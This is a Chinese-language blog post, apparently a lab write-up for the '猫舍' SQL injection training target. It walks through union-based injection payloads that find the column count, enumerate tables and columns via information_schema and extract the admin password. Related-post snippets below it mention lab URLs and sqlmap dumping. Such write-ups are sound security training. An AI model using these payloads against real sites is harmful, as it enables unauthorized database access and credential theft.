SQL注入之猫舍

已于 2023-07-16 11:35:27 修改
阅读量262 收藏
点赞数
文章标签: sql 数据库
于 2023-07-05 20:56:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64809022/article/details/131558363
版权

点击查看新闻

我们输入不同的id,可以得到不同的数据库,那么页面也就不同

测试:id=3,有网页,我们接着测试id=4 id=5 id=6 发现都没有内容,说明id最大为3

先查看是否存在注入点:构造?id=1 and 1=1

回车后发现页面正常

构造?id=1 and 1=2 

发现页面异常,得出结论:存在注入点

第二步 判断字段数,使用order by 1 和order by 2,页面无明显异常。

当order by 3时,页面出现异常,说明字段数为2

 

 第三步 判断回显点

构造" id=1 and 1=2 union select 1,2",发现页面回显 2,所以回显点为2

 

 查询相关内容

构造'?id=1 and 1=2 union select 1,databases() ' 得到数据库名为maoshe

 查询表名:?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1

 获取当前数据库表名为admin

 查询字段名:union select 1,column_name from information_schema.columns where table_schema =database() and table_name='admin' limit 0,1

获取当前表下字段名为 id

 ?id=1 and 1=2%20 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1

获取第二个字段名为 username

  ?id=1 and 1=2%20 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1

获取第三个字段名为 password

 查询用户名

查询用户名admin的密码

?id=1 and 1=2%20 union select 1,password from admin limit 0,1

得到密码为hello hack 

wsy678
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqlmap自动化注入猫舍靶场练习
weixin_45540609的博客
04-15 895
使用 python sqlmap.py -u 加上url 扫描存在漏洞,一路enter,paramenter显示有bool盲注 --dbs查看有哪些数据库,然后-D进入maoshe数据库 --tables查看有哪些数据表,-T进入数据表admin --columns查看有哪些字段 算了,直接在admin后面加 --dump脱库吧!铛铛,成功! ...
封神台——手工注入基础(猫舍
Zichel77的博客
07-04 7883
题目提示很明显,就是sql注入拿到管理员密码 点击传送门进入看到的是一个很简陋的猫舍页面 域名简单,没看到注入点http://59.63.200.79:8003/ 点击新闻页面看看 域名后面加上了id=1,说明存在着数据库的交互 那么这里就很有可能是注入点 把这个作为我们的目标urlhttp://59.63.200.79:8003/?id=1 进入手工注入步骤 第一步 判断是否存在SQL注入漏洞 构造and 1=1,这个语句是恒成立的,一般页面都是不报错的 再来试试1=2 .
SQL手工注入练习:辛巴猫舍 + Sqlmap秒杀
m0_64382069的博客
11-24 532
SQL手工注入练习:辛巴猫舍 + Sqlmap秒杀:登录靶场、判断是否存在SQL注入漏洞、判断数据库字段数、判断回显点、查询相关内容、查询表、查询字段名、查询字段内容、
封神台----SQL注入基础(猫舍
m0_74083553的博客
03-11 343
提示已经很明显了通过sql注入拿到管理员密码点击传送门进来发现是一个很简陋的页面点击查看试试看我们可以看到地址栏后面变成了?id=1。说明和后台数据库有交互可以尝试sql注入
通过SQL手工注入拿到管理员密码--辛巴猫舍
ningmini的博客
05-20 1935
通过SQL手工注入拿到管理员密码–辛巴猫舍 靶场地址: http://rhiq8003.ia.aqlab.cn/ 点击新闻页面看看 域名后面加上了id=1,说明存在着数据库的交互 那么这里就很有可能是注入点 把这个作为我们的目标url:http://rhiq8003.ia.aqlab.cn/?id=1 进入手工注入步骤 第一步 判断是否存在SQL注入漏洞 构造and 1=1,这个语句是恒成立的,一般页面都是不报错的 再来试试1=2 出错,初步说明存在着注入漏洞 第二步 判断数据库字段数 在这里会使用
猫舍-sql注入
tlucky的博客
04-16 2456
漏洞地址 http://afsgr16-b1ferw.aqlab.cn/index.php?id=1 漏洞类型 Sql注入 漏洞描述及危害 sql注入是一种将sql代码插入或添加到应用用户的输入参数中,再将这些参数传递给后台的sql服务器加以解析并执行。Sql注入会导致数据库信息泄露,网页被篡改,数据库被恶意操作,服务器被远程控制和被种植木马等多种危害。 漏洞详情 http://afsgr16-b1ferw.aqlab.cn/index.php?id=1 属于数字型注入 ①数据库名 ②表名 http://
猫舍室内装饰设计模型
07-31
在设计中,猫爬架可能被巧妙地融入墙壁、天花板或家具之中,既节省空间又增加了视觉吸引力。 【室内设计】不仅要考虑到功能性,还要注重美学和人性化。猫舍设计需兼顾猫咪的生活习惯和主人的审美品味。例如,设计师...
简易的猫舍管理系统.zip
03-13
《简易的猫舍管理系统》是一款专为猫舍日常运营设计的管理软件,旨在提升猫舍的管理水平,优化工作流程,确保猫咪的生活质量和客户服务质量。本文将深入解析该系统的各项功能和设计原理,帮助用户理解和应用。 一、...
猫舍静态网页可跳转源代码
最新发布
06-21
在IT行业中,静态网页是构建网站的基本元素之一,它们由HTML、CSS和JavaScript等静态文件组成,不依赖服务器端的动态脚本处理。"猫舍静态网页可跳转源代码"是一个关于创建静态网页的项目,它可能包含了实现网页间...
WhiteXB.github.io:白筱の猫舍
03-27
标题“WhiteXB.github.io:白筱の猫舍”暗示这是一个个人网页项目,托管在GitHub上。GitHub是一个面向开源及私有软件项目的托管平台,而".github.io"域名通常用于个人或组织创建的公开网页。因此,我们可以推断“白筱...
mysql后台注入靶场源码.rar
04-21
该资源为存在漏洞的网站源码,学习web安全的小伙伴可以用来搭建环境做测试用 方法: 上传所有文件到空间根目录下,运行http://你的域名/install进行安装 安装过程遇到的数据库用户名和密码可以咨询空间你的空间商 不需要会员功能可以删除member目录 安装完成后更改admin目录为你的后台目录名,更改后的访问地址为 http://你的域名/修改的后台目录名 安装完成后请及时删除install目录
商业计划书PPT模板粉色简约风猫舍咖啡馆创业招商计划书.pptx
10-19
商业计划书PPT模板粉色简约风猫舍咖啡馆创业招商计划书.pptx
sql简单注入-------基本步骤
xiaoduanDDG的博客
10-27 1262
本题用封神台靶场,第一道拯救女神小芳-猫舍的题作为例子 1.判断与数据库交互的地方是否存在注入点 方法:加入单引号'使数据库报错,说明存在注入点 2.判断字段数 用orderby或者group by 59.63.200.79:8003/?id=1 order by 1 //如果不报错则至少要有一个字段,进行第二个测试,直到报错为止 59.63.200.79:8003/...
手工注入(猫舍为例)
Greedy Hat的博客
07-31 2155
显错注入实例
ctf实战 掌控安全的靶场 第一关通关记录
wh1te 小白的博客
09-17 5806
第一关 进入传送门  发现是一个猫舍网站  点击查看新闻   进入猫舍界面内 网址为http://120.203.13.75:6815/?id=1  疑似可注入  尝试 and1=1回显正常 尝试 and1=2回显失败 存在sql注入  可以选择手工注入  也可以直接用工具   这里我用的是sqlmap(一个很强大的工具) sqlmap具体使用方法自己百度 贴一个比较好的...
SQL注入靶场实战-MySQL
qq_40467699的博客
04-17 9292
注:本次测试使用纯手工注入,无任何自动化软件辅助。 此靶场是运用了数据值的base64位编码,在转换编码的时候比较困难,手工回显注入无任何差别(无过滤字符)。 这里推荐火狐浏览器的HackBar插件,插件自带编码转换功能比较方便。 靶场地址:https://mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozh...
SQL注入靶场:辛巴猫舍
Zeker62的博客
07-28 5019
查:有多少行 进去是这样的:直接点击 可以看到:我们的url发生了变化, id是啥,我们猜测,id是数据库的前面的序号,像这样. 我们输入不同的id,可以得到不同的数据库,那么页面也就不同. 测试:id=3,有网页,我们接着测试id=4 id=5 id=6 发现都没有内容 说明id=3 的时候,数据表内容已经"见底"了 于是我们就知道了这个数据表有四行,包括id=0的初始页面 查:有多少列 使用order by 语句. 我从 1~3查,发现3没有,2有. 那么就证明这个数据表就两个字段 读者可以
利用SQL注入漏洞登录后台
weixin_33787529的博客
04-17 4422
2019独角兽企业重金招聘Python工程师标准>>> ...
php mysql操作语法错误,php - MySQL更新语法错误
weixin_42297444的博客
03-19 77
我做了一个简单的查询以使用php更新我的表,但无法找出错误。我的功能:function editData($id, $data) {$message ="";$query= "UPDATE blood_data SET name='{$data['name']}', group='{$data['group']}',address1='{$data['address']}', district='...
大一html网页制作作业 猫舍寄养
06-02
如果题目是猫舍寄养,那么可以考虑以下内容: 1. 页面布局:设计页面的整体布局,如头部、导航栏、内容区域等,可以使用CSS进行美化。 2. 导航栏:在页面的顶部或侧边添加导航栏,可以包括关于我们、服务介绍、价格...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值